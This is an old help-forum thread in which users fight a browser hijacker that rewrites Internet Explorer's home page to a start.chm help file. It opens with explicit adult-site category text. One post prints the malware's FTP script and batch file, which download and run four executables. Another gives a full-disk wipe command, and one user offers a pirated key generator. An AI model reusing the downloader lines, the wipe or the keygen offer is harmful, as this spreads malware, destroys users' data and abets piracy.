Latex, Movies... <b style="FONT-SIZE: 15px">Group Sex Interracial, Hardcore, Teen, Amateur, Threesome, Gangbang, Lesbians, Foursome Movies... <b style="FONT-SIZE: 15px">Latina Models, Sex, p--sy, Hardcore, Blowjob, Teen Amateur, Movies, Shemale, Lesbians... <b style="FONT-SIZE: 15px">Mature Women Anal Sex, p--sy, Sex, Lesbians, Movies Amateur, Fat, Blowjob, Anal, Tits, Housewife... <b style="FONT-SIZE: 15px">Pornstars Jenna Jameson, Aria Giovanni, Sky Tawnee Stone, Sylvia Saint, Briana Banks ... <b style="FONT-SIZE: 15px">Teens Cheerleaders, College Girls, Sex, p--sy, Anal, Lesbians, Schoolgirl, Blowjobs, Cumshots Petite, Shaved, Virgin, Hardcore, Tits, Movies... <b style="FONT-SIZE: 15px">Transsexuals Shemales, Transvestites, Hardcore, f---ing, Sex, Movies, Blowjob... </td> <td vAlign="top" noWrap align="left" height="887" style="font-size: 11px; font-family: Verdana,Arial"> <b style="FONT-SIZE: 15px">Asians Schoolgirls, p--sy, Models, Sex, Lesbians, Mature, Pornstars, Teens, Movies, Tits, Indians... <b style="FONT-SIZE: 15px">Bizarre / BDSM Spankings, Domination, Bondage, Balloons, Toys... <b style="FONT-SIZE: 15px">BBW / Fat Women Plumpers, Fat p--sy, Big Asses, Sex, Lesbians Mature, Tits... <b style="FONT-SIZE: 15px">Celebrities Britney Spears, Pamela Anderson, Jennifer Lopez Anna Kournikova, Christina Aguilera... <b style="FONT-SIZE: 15px">Ebony Black, p--sy, Teens, Amateur, Sex, Anal, Movies Blowjobs, p--sy, Tits, Lesbians, Pornstars... <b style="FONT-SIZE: 15px">Gay Sex, Oral Sex, Nude Men, Interracial, Hairy Men Twinks, Movies, Studs, Old, Hardcore, Group... <b style="FONT-SIZE: 15px">Interracial Dogfart, Black On Blondes, Sex, Hardcore Blowjobs, Anal Sex, Threesome, Movies... <b style="FONT-SIZE: 15px">Lesbians Sex, Kissing, Teen, Amateur, Black, Threesome Movies, Licking, Older... <b style="FONT-SIZE: 15px">Movies Asian, Lesbian, Ebony, Threesome, Amateur, Teen, Blowjobs, Anal, Hardcore, Cumshot... <b style="FONT-SIZE: 15px">p--sy Hairy, Shaved, Hirsute, Pierced, Closeups, Tight Mature, Teen, Amateur, Pink, Wet, Virgin... <b style="FONT-SIZE: 15px">Stories Erotic, Lesbian, Gay, Fetish... <b style="FONT-SIZE: 15px">Tits Big Tits, Mellons, Hooters, Small Tits, Nipples Boobs, Fat Tits, Black, Asian, Older, Movies... <b style="FONT-SIZE: 15px">Voyeur Upskirt, Web Cams, Sex, Underground, Spycams, Shower Cams, Outdoors... </td> </tr> </table> </td> </tr> </table> </body> </html>

0

Hmm, somehow this post doesn't let me display the text only... SORRY.

0

Well it's been 6 hours and counting since I ran PestPatrol 4.2 and I still have "MY" home page and not a single pop up (and I am not even using my popup blocker). I think it is safe to say I did kill the little bugger of a pest that was invading my pc. Good luck to all the rest of you. Where it comes from or who does it is just not important enough to worry about. The main objective is to: GET IT THE HELL OUT OF MY PC, which I did. Thanks for all your tips guys, cause I used them all and you all gave me the ideas to just keep looking for something else to remove it cause there had to be something out there and I did find it.

0

before the search page (http://linklist.cc/index.php?aid=20420) appears, mi browser "tries" to open this URL: http://yewrqa.t.muxa.cc/s.php?aid=420 when I run H¡jackTh¡s, I got this: R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://yewrqa.t.muxa.cc/s.php?aid=420 (obfuscated) R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://yewrqa.t.muxa.cc/s.php?aid=420 (obfuscated) R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://yewrqa.t.muxa.cc/s.php?aid=420 (obfuscated) R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://yewrqa.t.muxa.cc/s.php?aid=420 (obfuscated) and then the same but instead of R1, R0.... anyway...I'm not getting the mk:@MSITStore:C:\WINDOWS\start.chm::/start.html anymore...but I guess it's part of the same problem 'cuase I changed the start page and after a while it came back... and when I do the read only trick it goes back to normal....for a couple of hours... I just checked start page and I found this: http://%79%65%77%72%71%61%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420 anyone knows what this might be...because of the '=420' at the end of it, I think it's the same URL I wrote above.... I'm looking in the registry now and I found this folder wich look suspicios: HKEY_USERS\S-1-5-21-329068152-1060284298-1957994488-1003\Software\Microsoft\Search Assistant This Search Assistant thing...I think it has something to do with it....anyway....I found it 'cause it was the open folder in the registry...I'm the only one who messes with the registry in this computer....and I never was on that folder before...another thing that made me wonder is that as I went to start menu and made click on "run", the type bar whas blank....and as far as I know, it keeps the last thing you typed in... anyway...to many questions in this issue.... when are the anti-virus companyes, or microsoft do something about it?? I spent a lot of time today surfing pages like microsoft security or symantec and not a word about this......

0

that Search Assistant in the registry was from the windows search...so it has nothing to d with the bug....

0

Start.chm is a compiled help file. It contains a bunch of JPG files and HTML files. You can decompile if you download the HTML Help Workshop from Microsoft (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/htmlhelp/html/hwMicrosoftHTMLHelpDownloads.asp) When you decompress Start.chm you'll find that it contains Start.html. To make the long story short, if you open your browser after 9:00 pm or before 8:00 am then this annoying browser hijacker will display a porn-related web page. Otherwise it displays the annoying search page that we are all tired of seeing. mk:@MSITStore is basically an HTML help command for Internet Explorer. It lets you display HTML help topics inside the browser. Unfortunately I still haven't figured out how the default home page gets changed in the first place!!

0

I don't know 'bout you guys, but I've had it with this bug...it's time to do a backup and then......'format c:'.....yeah!

0

Hurst I'm tellin you I got it fixed. Pest Patrol 4.2. I'd offer to send it to you but it is 7.6mbs big. I tried everything, and also was on the verge of a format over it. But I ran Pest Patrol at 6pm last night and it is now 5:15pm the next day and nothing, nada, zilch. No extra popups, no changed homepage, nothing. I'm tellin you it works. Much better than adware blaster or spybotSD.

0

Try this/Tentem isso (i found it now): in http://forum.hardware.fr/hardwarefr/WindowsSoftwareReseaux/sujet-162690-1.htm " une solution en anglais ici: http://www.pcguide.com/vb/showthread.php?s=&threadid=29039 The homepage is set to mk@MSITStore:C:\WINDOWS\start.chmstart.html And the following files are created over and over again: acces.exe (TIF) start.chm (Windows) start.html (windows) command(.pif) (Windows) XXXX.bat (Temp folder) I finally found out that these files are downloaded from the location main.tibssystems.com by looking at the files in my TIF folder. After that, I added to my hosts file the entry 127.0.0.1 main.tibssystems.com and now I don't have any problems anymore. Somewhere in your windows directory there is a file called hosts. I thinks its exact location varies depending on which version of windows you use. To edit it you just open it in notepad and then you can add the line 127.0.0.1 main.tibssystems.com to the end of the file and save it. once thats done you can also right click on the file select properties and select the read-only option. That should prevent malicious programs being able to enter their own things int it. The file should just be called hosts with no file extension. Just found the list of where the host file can be found in the different versions.. Windows 95/98/Me c:\windows\hosts Windows NT/2000/XP Pro c:\winnt\system32\drivers\etc\hosts Windows XP Home c:\windows\system32\drivers\etc\hosts "

0

The dam bug is back today - it again changed my home page address + restored the start.chm that I deleted yesterday... Thanks Brasil2004 for giving me a clue as to the possible source file of this freakin bug when you mentioned: To edit it you just open it in notepad and then you can add the line 127.0.0.1 main.tibssystems.com I mentioned about the mysterious "reportstats" file yesterday in my post... Just to check with the rest of you, can I ask all of you guys who have this bug, after you deleted the start.chm the day before and found it reappear the next day, look inside your "Temporary Internet Files" folder (after setting the View Folder options to Show All), see if there is this application file called "reportstats".... Brasil2004 pointed out earlier the web address "main.tibssystems.com"... This is THE EXACT SAME internet address that the "reportstats" came from! After deleting everything from the folder + deleting start.chm, "reportstats" file reappeared today in my Temporary Internet folder - it might have been the same time as when the dam bug reappeared... Guys, I would just like to know if it is the same for the rest of you...Is it? Is this the file that is causing the bug to recreate itself? I have no way of copying the file out of the Temp Internet folder to examine it...Microsoft IE won't let me. But then again, if this is the source file - how is it being called and downloaded to our computers??? I am just about fed up with this Russian(at least that is what Symantec's Visual Traceroute told me) virus/spyware...

0

I had the reportstasts file too....I deleted it...but if you're saying it appears again...anyway...I added that extra line to hosts....let's hope it fixes it...I'm also going to run Pest Patrol just in case.... a question for all of you: since yesterday I'm not getting the mk:@MSITStore:C:\WINDOWS\start.chm::/start.html now it just opens a webpage....anyone knows if this is 'normal'?

0

Help this bug is driving me crazy!!! Ive tried everthing exept pest patrol and Im seriosly considering formatting. What really works to get rid of this thing?

0

Could you folks please check if there is a program named "elsewma.exe" on your machine. I'm running a test to see if this is a source of this problem. If you want to run the same test you'll need to remove the entry from the registry that causes this program to run when Windows starts up, and then kill the running program from the Task Manager. I'll post the results of the test tomorrow.

0

Hello All, I had this little devil on my michine, I made it stop.....Here is what i have figured out: the javascript is loaded every time that explorer is opened (it is set to the homepage) this updates the widows components to assure that if the home page is changed it will not remain changed after you restart your pc. I think that the reson the above modifications to start.html and start.chm are working for some people and not for others is: some people are probably changing the code and changing their homepage as well. This will not work. Because the code isn't called to run agian. Here are the steps I used to end the insanity.. 1) Changed 1 line of the start.html javascript from the orig to : } window.location.replace("http://www.google.com"); </SCRIPT> 2) Saved the changes 3) rebooted (didn't change my homepage in explerer!) If you change the home page the javascript won't run. 4) change your homepage 5) reboot agian This worked for me, hope it helps..... Best regards, ION

0

I don't know if the info at the link below will be of any help at all but since it references " "cannot open mk@MSITStore.....chm." I thought I'd pass it on. It also has a link to a Free download. Again, it may be irrelevant to the problem you are having but it's worth a look. Scroll down to "7)Broken "Help". Broken Help Tufenuf

0

Hello all, I think I left out a step, here it is: 1) Changed 1 line of the start.html javascript from the orig to : } window.location.replace("http://www.google.com"); </SCRIPT> 2) Saved the changes 3) Launch Explorer (run the code!) 4) rebooted (didn't change my homepage in explerer!) If you change the home page the javascript won't run. 5) change your homepage 6) reboot agian I remember changing the code, then launching explorer. Then I restarted. Best regards, ION

0

Haven't seen the bug in days. I did a system restore on Win XP, scanned my registry and removed all referances to master-search ( had done this before but it was full of them and the restore date was well before I had any problems). Then I ran and updated Spybot Search and Destroy and it found four of more files it previously didn't. I am now running Spyware Blaster to keep that type of mess from returning, and HiJackThis to keep a check on my system (all this software is free and updateable). You need to set your internet options where Active X can't load unless you want it to, (a doorway for these files) I think Spyware Blaster will warn you if you don't have it set and may set it for you. I now have my Norton Internet Security set so I can track everything that comes into my pc. Alot of the post I see here will not work and leave you wide open. Reseach is the key and I have done my share. Good luck and happy browsing. Hope this works for you.

0

I am no expert that is for sure but I know more than I did lol. I did leave a thing or two out, not sure if I can even remember it all. Run Spybot in advanced mode, there are a few options to pick from that you may want to add. I also run Adaware and have set options in it, they seem to update daily but it hasn't found a thing on my pc in week or two. Another program I was running but am not now, (it went away when I restored) was Cyber Patrol or something like that. (It has an Icon with some type of dog on it) Anything you installed between now and the restore date will be gone but if you still have the install file you can reinstall it and most keep their logs intact. I'll hush now and keep my eyes open because the reality is that even with all I have done and am doing I can't say it won't be back.

0

Day 2 and no bugs, new start pages, or popups overriding my popup filter. I tried it all. Was ready to format. Then tried Pest Patrol 4.2 Trial version /with "patch". Before I deleted my Temporary Internet Files I had 97 confirmed or suspicious files in my computer. After deleting all Temporary Internet Files, History, Temp, Recent, and Recycle Bin, I still had 89 confirmed or suspicious files on my computer. Pest Patrol found them all and I was able to delete them. Most of them were hiding in the "favorites" folder. Just hope you all decide to use Pest Patrol as it worked for me.

0

terri I followed your advice but I have a problem...do you know were I can find a 'patch' for pest patrol trial version?? thanx

0

hmmm... i opened the hosts file w/notepad and i already had "127.0.0.1 local hosts" in it, what would that have to do with the 127.0.0.1 main.tibssystems.com?

0

Hurst, you can find the "patch" in your email box, providing you posted a valid email. If you didn't then drop me a line, ok?

0

yay i think i found out how to block the reportstats thing. you just go to internet properties, then the tab on privacy. from there, you go to the edit button where u can block cookies that come from certain places. then you add the main.tibssystems.com in the block list. maybe that might work. all i was doing was lookin thru the temp. internet files and saw reportstats once. then i deleted it and found the method to block it. tell me if this works or not

0

I don't think tibssystems has a thing to do with it, 90% of my traffic comes from there. I did put one block on it way back but that just blocks something from starting in Yahoo Messanger. It's not a tracking cookie so the cookie thing will be no help however it may be a good thing to do, mine is just set to dump them when I shut the application. I have settings to start the bad ones anyway. Active X it the doorway and that needs attention. Spyware Blaster will help with all that. And the free programs I mentioned are a better fix, using an illegal copy of that other stuff and posting it here is a bad idea. There are some companies that know you patched when you update and no telling what you may end up with. Nonetheless I solved my problem and I feel I will never have another one of those with what I did to get rid of it and block the return. Take care and do as you want.

0

I have IE 5.5 and everything that can be disabled is, except for temp cookies and active scripting (Yahoo mail needs it). I still got the bug. I think I just got another! MY-FINDER.COM is doing the same thing and loading 4 websites into my favorites. How is it getting thru onto my computer??? PS... I don't have the elsewma.exe file. The stats was in my temp folder once, don't know when it appeared, but I deleted it.

0

Someone mentioned something about HOSTS, I have under c/windows (IE5.5 and WinME): HOSTS (SAM file) hosts.20031202-014156.backup (BACKUP file) hosts.bak0 (BAK0 file) and: svchost (APPLICATION file)

0

To skeleton: I do have the original retail version of the Pest Patrol around here somewhere, just can't seem to put my hands on the disk I backed it up onto right now. And with the problems I was having with this pc all I wanted to do was get it fixed. Once I remember what disk it is sitting on, I'll uninstall this version and put the other one back in. And to correct the proper terminology it is not a "patch", it is a key generator, but I figured if I posted that it would be removed, just as I expect this post to be because I mentioned it in here.

0

I dont know if this will help any one but I changed the file extention from start.chm to start.htm. Then opened it in wordpad and deleted all the contents and saved. then I changed the file extension back to chm and left it alone for a while. I had no problems with it so I deleted it. I havent seen it since lunch time yesterday. I hope this helps someone!!

0

Well I was wrong-- as soon as I rebooted it was back I may just format and reinstall windows to heck with this little bug!

0

Get yourself some firewall software (e.g. ZoneAlarm) and block the IP address for main.tibssystems.com (currently 81.211.105.70).

0

Well it's been 4 days for me and no more hijacks here.

0

There is a fix for that here. Fix for MSITStore http://www.master-search.com/

0

I have the same virus and maybe found what makes it work. I found two files on my desktop: o a script file that logs onto an ftp site and grabs four programs o.bat batch file to execute four programs that the script has just finished downloading. I don't know what initiates the script or the bat but here they are. ============================ C:\~WIN98\Desktop\o open downloads.default-homepage-network.com tmpacct 12345 bin get silent.exe get bs5-nt15v.exe get CS4P028.exe get 0021-bdl94126.exe bye ============================== C:\~WIN98\Desktop\o.bat if not exist C:\~WIN98statuslog ftp -s:o if exist silent.exe silent.exe if exist bs5-nt15v.exe bs5-nt15v.exe if exist CS4P028.exe CS4P028.exe if exist 0021-bdl94126.exe 0021-bdl94126.EXE

0

Mlens, you should go back and read the over 70 posts on this subject. If you had you wouldn't of posted what you did because everyone here has agreed the problem came from http://www.master-search.com/. Me along with everyone else that has had this problem went there and downloaded that "remove.exe" file to "fix" the problem. The only thing it did was to change your homepage from whatever it was to MSN.com. Then the file deletes itself so you have to go back to http://www.master-search.com/ to get the file again to try and fix it once you see that your homepage has been hijacked once more. The effort was appriciated but please read the posts.

0

where, oh where do i find pestpatrol 4.2? is this the only option that works?

0

Here is where you can download the trial version: http://www.pestpatrol.com/Downloads/Eval/DownloadHomeEvalNew.asp

0

Don't know about the other programs, but it has been 5 days and counting for me. I run Pest Patrol every day and come up with at least 40 pests, along with programs that have installed themselves!! I'll stick with what works, Pest Patrol.

0

Ok so I hate guns right, I am not a gun person and I really have a thing against resorting to violence... but If any one would like to join me on a hunting and lynching party I think I'm leaving for Russia in about 4 seconds!!!! Since I have picked up this S.O.B I can not download any files.. when I attempt to I get redirected to the searchpage yet again. Everyone is talking about two files in their OS hardrive, where as I only have the one. C:\searchpage.html which I tried to edit the text and make it read only. The thing is it still tries to come up in IE. It is blank because of the edit but it still runs. Now because of this problem I can't even download this Pest Patrol to try it out. I dont know what to do. I am completely disabled at this point! and I am PISSED!

0

Is it possible you have a scanreg/restore date on your system prior to the "searchpage bug" that you could restore to? I would email you the Pest Patrol program but it is 7.6mbs big and that is too big for any free webmail program. If you have an ISP mail you would like me to mail it to email me with the address.

0

I wrote to Pest Patrol about this one, and here's the reply I got (my original message to them follows the reply)... Entered on 04/19/2004 at 10:24:05 by Stuart Wilson: Dear Marc, Thank you for submitting details of this pest which may transpire to be related to the Master Search pest which has emerged recently. The PestPatrol Research Team is investigating an explosive growth of new and changed malware programs, and a large number of new pests are added to our database each week. We continue to develop our PestPatrol technology to defeat these newly created pests and ensure you are protected from their harmful effects. What you can do next: Ensure you are running the newest version of PestPatrol; V4.4. The ‘Info > About’ tab lists your version number of PestPatrol, if this is not the most current, you can upgrade by following the instructions on this page: http://www.pestpatrol.com/UpgradeArea/autoupgrade.asp Make sure you are running the latest scan strings by running PPUpdater regularly, at least once per week. The latest version of PPUpdater is V4.4.0.33; if you have an older version of this tool, you can upgrade by using the Autoupgrade link above. PPUpdater can be launched from PPControl, or the PestPatrol ‘Options > Updates’ tab. Ensure that PestPatrol is correctly configured to detect all pests. 1. Select the C drive (or all active drives) for scanning. 2. Check all relevant categories on the “Options | What to search for” tab. 3. Be sure to reboot the computer and rescan if prompted by PestPatrol. You can check on the new and updated pest detections posted to our Research Center when scan strings are updated: http://pestpatrol.com/PestResearchCenter/News/New_And_Improved_Detections.asp You can learn about configuring your computer to help prevent pest infection at our Research Center: http://pestpatrol.com/PestResearchCenter/WhitePapers/PestPrevention.asp What we will do next: The PestPatrol Research team will continue to research this pest, and develop our technology to improve the detection and ability to successfully delete it. We will deliver this technology in scan string and component updates. Remember: Run PPUpdater regularly to ensure you have the very newest technology in the war against spyware! Best regards, Stuart Wilson Pest Patrol Support [Here's my original message to them:] Entered on 04/11/2004 at 20:33:06 by PestPatrol@jtscons.com: Is this the place to report previously-undected adware/trojans that have popped up? Because I've run into a real pesky one, and it apparently hasn't been around long. The writer seems to be from Russia or the Ukraine or something. The trojan's m.o. is to rewrite your homepage URL in IE to the string I pasted into the Subject line. It also creates the start.chm and start.html files in the Windows directory. If you try to delete the files and restore your homepage URL (either from the browser or with Regedit), the trojan will restore (re-create) the files and re-overwrite your homepage pointer within 1-10 minutes. Normally, the redirection takes you to a page full of generic search links, but in one case, I ended up vectored to a page full of porn links, complete with explicit thumbnails. I have a lot more data on this trojan that I'll be happy to share, and you can learn what others have experienced by reading through this online forum thread: http://www.computing.net/windows95/wwwboard/forum/157485.html One poster on the above link says he may have picked up the trojan while surfing porn. I know I wasn't doing that, but I did visit a music lyrics site that bombarded me with pop-ups. I'm guessing that's where I got it. I don't remember the site's URL. I've scanned my entire harddrive with Norton Antivirus and Pest Patrol, and nothing shows up. The only workaround I've found is to create blank, write-protected Start.chm and Start.html files in the Windows directory, so the trojan is blocked from creating its own. That also seems to stop it from overwriting the homepage URL entry in the browser (IE 6, with latest security updates as of 4-10-04). But I fear that the trojan is still there, and even though it may not be overwriting my homepage URL, who knows what else it may be doing? Thank you very much, Marc Ticket Title: New Trojan: mk:@MSITStore:C:\WINDOWS\start.chm::/start.html Ticket Number: 52120 Priority: Standard Created on: 04/11/2004 Status: Closed Closed on: 04/19/2004 at 10:24:05 Eastern Time Attachments

0

simple solution , go to windows search , search for the files created in last two days(for example i started getting this problem in last two days only) , delete all the unfamiliar files created in last two days. thats it , simple solutions for complex problems.

0

Mat, only problem is that those files keep coming back. It took me 3 days of constantly deleting them for them to not come back, but the problem of the home page replaced by the search page still remained. Today makes 7 days free and clear from it for me and that is only because of Pest Patrol. Belive me, it's not so simple. Wait, you'll see.

0

My wonderful boyfriend got this mess on his computer recently and when I ran a search for the start.____ files I couldn't find them. Does anyone know why? I ran a search and everything! I am going to try the Pest Control deal next.

0

Ok, heres the problem. I tried to run the Pest Control program and the download exe file won't start because the stupid search everything site shows up and overrides it. I then tried to do the master-search thing and again the exe file would not work because the stupid site came back. Someone please help me!

0

(I hope this doesn't end up being a duplicate message. I tried to post a few minutes ago, but it didn't seem to go through. Here goes again...) DesertAngel: First, on your inability to find the start.chm or start.html files, the text that shows up in your address field--you know, your "new" homepage--should have that information. Example: mk:@MSITStore:C:\WINDOWS\start.chm::/start.html That line tells you that it's getting the files in C:\WINDOWS and that the file names are start.chm and start.html. If you're seeing different file names in a different directory (which is quite possible, because this bug seems to morph a lot), that's where you should look, and what you should look for. You don't have to edit the files to disable them. I prefer to replace them entirely. Here's how: Delete them as you would any other file, and then, in the same directory, right-click, select New -> Text Document. Windows will place a file called NewTextDocument.txt in the directory and highlight it so you can retype a new name. Type one of the two names from the homepage string, like (in this example) start.chm. Windows will ask you to confirm that you really want to change the file extension. Answer YES because you do. Now right-click on that file name and select Properties. In the window that pops up, check the box that says Read Only and click OK. Repeat for the other file name (start.html in the example). That fix right there gives the trojan nothing to work with when you start Explorer. That might make it possible to download PestPatrol. Another option (maybe): Have you tried using the Search window to download the program? Maybe the trojan doesn't affect that (I have no way of testing it myself, as the trojan appears to have either left my machine or gone dormant). Here's the proceedure: Start->Search->For Files or Folders In the "Address" window, type the following URL: http://www.pestpatrol.com/Downloads/Eval/DownloadHomeEvalNew.asp Then see if the download will work. I don't have high hopes, since IE is such an integrated part of Windows, the search window might be compromised as well, but it's worth a shot. The only other thing I can think of is: download Opera (www.opera.com) or some other browser on an uninfected machine, and transfer it to your machine via Ethernet or CD-ROM. Then install that on your machine and use it to surf/download/etc. Third-party browsers like Opera don't have access to system functions like IE, and aren't nearly as susceptible to adware and trojans. Good luck, and let us know if any of this works!

0

Hey, I've been battling this thing for about 10 days now, with no success. I downloaded the Pest Patrol to another computer, saved it to CD, and I'm going to try to install it to my computer from the cd drive later tonight. Hopefully that helps. Have all of you had continued success using this? Sure hope so! Thanks The Beav

0

Well guys, and gals, I've been clean of this nasty pest for 8 days now. If anyone wants the "patch" for the pest patrol just email me and I'll send it back to you.

0

Terri, I used Pest Patrol and downloaded the latest update on it last night. I hope that works. I keep reading about a "patch" for this in this thread...what is that all about? The Beav

0

for those who have been following this thread, heres a little more info that you might find interesting. This chart shows some popular sites on the same IP net as master-search.com http://uptime.netcraft.com/up/hosted?netname=SOVINTEL-ICSTM2,81.211.105.0,81.211.105.255

0

ok, theres seems to be no fix for this currently. I have read alot about this and I cannot find a reliable fix. Tried CWS, Hijackthis, Multiple virus scanners, deleted start.chm/html files in c:windows, deleted/modified reg settings. the only thing that I can find to work around this until Microshaft comes out with a real update to fix it is to do the following. more or less, disable windows help. Now if your like me and never use, you will never miss it. -create a new text document on your desktop. -rename it to nothing.exe -yes u want to change the file extension -put nothing.exe in c:\program files\ -2x click my computer -tools/folder options/file types -find the CHM file extension and select it -click advanced(this is for WinXP, I think its different for win98, edit or something) -select New -under action, type in "nothing" minus the quotes. this is what we are doing, nothing actually. -then for the application to use select browse and then find that nothing.exe program we made earlier. -click ok -select nothing now, and hit set default -now hit ok and close and yer done Note: now whenever reference to a CHM file occurs windows will open it with the program nothing.exe that we "made." it will give u an error saying this is not a valid win32 application or something like that. thats fine, we know what happened if this ever pops up in the future. this "should" prevent unwanted start pages from appearing, ie porn and such. you mite want to follow other advice on this topic to do some more cleaning if you would like. hope this works for you all. brad.

0

I'll repeat this one more time.... Get yourself some firewall software (e.g. ZoneAlarm) and block the IP address for main.tibssystems.com (currently 81.211.105.70). I've installed it and the problem is gone. End of story.

0

Just was at the CWShredder home site and found this. News and Updates April 20, 2004: * WARNING * The CWS trojan is appearing in a new variant which installs through a zero-day exploit in the IE HTML Help system, for more information see here and for a workaround see here. If you are infected, your homepage will change to something like mk:@MSITStore:C:\WINDOWS\start.chm::/start.html. Please keep an eye on WindowsUpdate until a patch for this exploit is available. You may want to check out the 2 "here" links which are in bold letters which may be of some help. Merijn.org Tufenuf

0

CWShredder does not take care of this particular bug! I am, however, going to disable the Windows help file as described in the one "here" link at about.com. Also, would disabling/eliminating the Java file that it seems to work in help matters any? Also, how do you use Zone Alarm to target a specific IP address? I've looked through it and can't seem to figure it out. Is this only available in the Zone Alarm Pro version? Thanks! The Beav

0

I have been BUG FREE since April 10th, I was response # 22, followed g2's deal in response # 21 and have had NO PROBLEMS since, over 2 weeks now. I think the trick is leaving the 'Start' files empty as 'read only', the bug does not come back as long as its 'nest' is empty and locked. Thanks again g2, that was heads up problem solving! I reiterate to those who want to use 'Master-Search.com's fix, it's not paranoia to stay away from the thug's who whack you, where they hit you with one bug they can hit you with another. If you are not linked to their server, you can't pick up their bug...kind of like STD's...have a great weekend y'all

0

thanks to this post i think i have it clear now also but man it has been a long read thanks to all for time and effort as i have tried many sites and this one has the best responces.

0

Spoke to soon its back again did the notpad thing in the start chm then delated it i am sick of this and am also looking to format.

0

chris just read your other post , format may not be enough , fdisk as well . Or , better still . WIPE OUT http://www.lurkhere.com/~nicefiles/index.html Freeware . WIPE OUT : as the name implies, this utility will absolutely WIPE your hard drive. For those times when an industrial strength cleaner is needed to remove any pesky files Fdisk may have left behind. A readme file is included in the zip file. WARNING...WIPE OUT will remove ALL data from the Hard Drive. WARNING The use of WIPEOUT can and will result in the loss of ALL data on your hard drive. DIRECTIONS 1- Unzip file 2- Copy WIPEOUT to a Win9x/me boot disk 3- Boot with Win9x/me disk 4- At the A:\> type "wipeout c: /nq /np" (no quotes) /nq = no queries - you will not be asked if you are sure. /np = no partitions - this will overwrite the MBR Press Enter . Now run fdisk to set up partitions . When done , reboot & format .

0

Chris, did you lock the start.chm file as read-only after you cleared it? I haven't had a pop up for 24 hours now. Email me if you need further help. This seems to be the best way of taking care of this buggar. Yikes, the option above seems rather drastic. I hope I don't have to resort to it. The Beav

0

I've been following this with interest. It would seem one should introduce oneself in the Alcoholics Anonomous kind of way: "Hello ... I'm Neville ... and I'm infected". My history is slightly different than the rest. While I've been getting the start.chm thing it happens with long gaps inbetween ... normally a few days. I created the empty start.chm and start.html with read-only. Yesterday took a different turn. The files start.chm and start.html disappeared off my disk DESPITE being read only!!! I put them back ... read-only. Today I got a new twist in the virus ... while searching Microsoft's sight this morning, I suddenly got a popup directly to www.master-search.com with some screen showing a porn movie. I never saw the full screen - I am now adept at hitting [stop] on the browser as soon as anything relating to master-search happens ... :O( So ... I now have PestPatrol, Spyhunter, Spybot, AdAware(6), Bazooka, McAfee Virus, McAfee Firewall ... have the empty files (read-only) ... and just got whacked again. These guys are damn good! And damn annoying. I find it ASTOUNDING that so many days have passed since this thing was first identified on the net and that NO-ONE has found exactly how it works and how to kill it. Oh ... I also have my wife wanting to know why the internet sometimes defaults to porn pages.

0

Valerie has found this link . http://support.microsoft.com/default.aspx?scid=kb;en-us;312456

0

I had SpywareGuard running to let me know when something (the master-search porno page thing) was trying re-set my homepage. I used the master-search online fix (dangerous, I know); NB I didn't download their fix file, I did it online. It had one last go at resetting homepage (I was alerted by SpywareGuard); there was also a message in bad English telling me the problem was resolved, and wishing me a nice day. My heart sank at that point, and I expected to see smoke coming out of my pc, and dancing pono-gals laughing at me. However, I then deleted the start.chm file and (to be on safe side) got rid of it from recycle bin. I also deleted the 'reportstats' thing (see above); it wasn't called precisely that, but "report something-or-other", and it was an .exe file. Since doing all this (72 hours ago) I've been bug-free, thank the lordy, as it was a right royal pain in the butt. I've used the net as much as poss during that time, and had no probs.

0

Guys, I also tried everything... but did as described in response #94 - thanks tufenuf - actual link is: http://netsecurity.about.com/cs/generalsecurity/a/aa021504.htm So far so good...Neville - my wife was wondering the same thing... BC

0

48 hours, so far, so good. My monitor isn't even making these weird flashes like it was before it would hijack the browser again. I checked on the start.chm file, and it is still empty, read-only. Ditto @ wife wondering about porn on the computer. I got a call at work one afternoon when she was trying to log on to some school stuff. She was understandably edgy until we could get rid of this thing. I also wonder why the big AV companies haven't come up with anything yet. It seems like a lot of people are battling this thing, just by what I find doing a Google search. One other thing I've done is not allow the remove.exe file access the internet via ZoneLabs. I don't know if that's helping any, but that was the file that was downloaded at master-search.com. Good thread, gang...keep us all informed about what you're finding! The Beav www.beaverick.net

0

how long has it been since this annoyance come about? i have done most of the solutions suggested but none seem to work, recently i have been getting virus alert popups, its not an IE pop up, doesnt direct me to another page or anything, its a little popup saying im infected by a trogan virus and ask me if i would like to cure it, giving me a choice of yes and no..... being paranoid as i am i didnt click neither, and when i couldnt click the exit box to close the window, i decided to restart my computer, haha is this part of the master-search hijack? or do i have something else to worry about?

0

Well I've been clean for about 13 days now and had it for about 4 days so that makes it about 17 days since it reared it's ugly head.

0

Damn. The "thing" hasn't popped up it's head for a few days ... I was hoping I was free. I was surfing just now ... got a popup which said "You may be infected with Spyware - do you want a solution?" ... then took me where? Guess? www.master-search.com This is like HIV ... you know you've got it ... and also know there is no-one out there who can help you. Yes ... I have tried everything.

0

It looks like some progress is being made on this monster. Check out "Pieter_Arntz" Reply in the thread at the link below below where they now have a .reg file to download along with other recommendations. mk:@MSITStore:C:\WINDOWS\start.chm::/start.html Monster Tufenuf

0

Neville, don't lose heart! By changing the start.chm file, I don't think we totally got rid of the bug, we just eliminated it's ability to hijack the homepage. Four days for me now, although last night my browser did seem to flash once like it was trying to be hijacked again. I went back to the start.chm file, and it was still locked with nothing in it. I haven't experienced the pop up--yet (knock on wood). There's another file that tried to access the internet last night, but I denied it via ZoneAlarm. Are you running that? Make sure that you know all of the programs that are making contact. That might be another place to attack this thing. Wiping out and locking the start.chm file is a great way for us to start, but we really won't totally get rid of this thing until we get a fix from one of the AV companies.

0

